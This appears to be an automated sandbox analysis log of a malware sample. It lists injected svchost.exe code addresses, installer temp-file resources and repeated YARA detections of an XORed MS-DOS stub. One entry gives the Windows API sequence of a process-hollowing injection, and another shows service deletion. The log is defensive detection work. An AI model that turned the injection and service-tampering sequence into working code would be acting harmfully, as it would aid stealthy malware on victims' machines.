Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19846A50
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19880A60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1985DD37
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19850D40
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19839D55
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198DEC74
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984EC80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19887C80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19855CD0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19829CE0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19838C20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19865C30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198B3C60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19857B80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19885BAD
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198B1BD0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198A7F20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1985CF3F
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984FE00
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198E3E20
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1984AE40
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19825080
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19828090
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19834FF0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1987BFF0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198B3030
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198ADF70
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1989033F
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19867270
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1989B2B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1982A210
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19898260
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19887190
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198BB1B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E174902E8
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339F5E0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339B4B0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A0CB0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33ABC8D
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AC575
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338EBD0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AE480
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339E450
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33892C0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A72F0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AC31E
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A8310
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3387380
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B2360
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3398190
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338E200
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C79DC
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33951D0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3385280
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C026C
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3388100
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B0100
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B08E0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C48CC
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33CA116
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3391150
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3398FB0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3382FA0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B680C
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3396010
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A4070
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33BA068
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339C6B0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C9EFD
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33BBEE0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338F730
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339CF50
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33BC5B0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3390E00
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3394E00
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33BDDC4
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3389640
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33ABE25
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3396E10
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3394660
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F32C02E8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC98E0 GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,WaitForSingleObject,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,
Source: MSIFBC3.tmp.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MSIFBC3.tmp.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MSIFBC3.tmp.10.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIFBC3.tmp.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MSIFBC3.tmp.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-JDQA9.tmp.11.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-JDQA9.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-JDQA9.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: is-CU1EC.tmp.11.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC3A20 OpenSCManagerW,OpenServiceW,QueryServiceStatus,ControlService,Sleep,DeleteService,wsprintfW,SHDeleteKeyW,CloseServiceHandle,CloseServiceHandle,
Source: 27.2.svchost.exe.2743a320000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 34.2.svchost.exe.202b28f0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 20.2.svchost.exe.1d91aad0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 24.2.svchost.exe.1dc51fb0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 37.2.svchost.exe.1afba170000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 13.2.rundll32.exe.4eb0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 28.2.svchost.exe.1111ac00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 30.2.svchost.exe.1be5cd40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 16.2.svchost.exe.12e17870000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 28.0.svchost.exe.1111ac00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 34.0.svchost.exe.202b28f0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 25.2.svchost.exe.2216b8b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 17.0.svchost.exe.204f3380000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 34.0.svchost.exe.202b28f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 38.0.svchost.exe.25c96c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 27.2.svchost.exe.2743a320000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 37.0.svchost.exe.1afba170000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 19.2.svchost.exe.233426d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 22.0.svchost.exe.222cab20000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 25.0.svchost.exe.2216b8b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 30.0.svchost.exe.1be5cd40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 14.0.svchost.exe.24b7d0d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 24.0.svchost.exe.1dc51fb0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 21.0.svchost.exe.2f2c5c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 17.2.svchost.exe.204f3380000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 37.2.svchost.exe.1afba170000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 28.2.svchost.exe.1111ac00000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 31.2.svchost.exe.21c23140000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 23.2.svchost.exe.28621cd0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 27.0.svchost.exe.2743a320000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 30.2.svchost.exe.1be5cd40000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 29.0.svchost.exe.22f12740000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 28.0.svchost.exe.1111ac00000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 23.0.svchost.exe.28621cd0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 29.2.svchost.exe.22f12740000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 31.2.svchost.exe.21c23140000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 13.2.rundll32.exe.4eb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 31.0.svchost.exe.21c23140000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 27.0.svchost.exe.2743a320000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 25.2.svchost.exe.2216b8b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 17.2.svchost.exe.204f3380000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 21.0.svchost.exe.2f2c5c00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 38.2.svchost.exe.25c96c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 14.2.svchost.exe.24b7d0d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 34.2.svchost.exe.202b28f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 30.0.svchost.exe.1be5cd40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 14.2.svchost.exe.24b7d0d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 38.0.svchost.exe.25c96c80000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 22.2.svchost.exe.222cab20000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 22.0.svchost.exe.222cab20000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 19.0.svchost.exe.233426d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 31.0.svchost.exe.21c23140000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 19.0.svchost.exe.233426d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 23.2.svchost.exe.28621cd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 20.2.svchost.exe.1d91aad0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 24.0.svchost.exe.1dc51fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 29.2.svchost.exe.22f12740000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 17.0.svchost.exe.204f3380000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 22.2.svchost.exe.222cab20000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 29.0.svchost.exe.22f12740000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 21.2.svchost.exe.2f2c5c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 21.2.svchost.exe.2f2c5c00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 16.2.svchost.exe.12e17870000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 19.2.svchost.exe.233426d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 20.0.svchost.exe.1d91aad0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 25.0.svchost.exe.2216b8b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 38.2.svchost.exe.25c96c80000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 23.0.svchost.exe.28621cd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
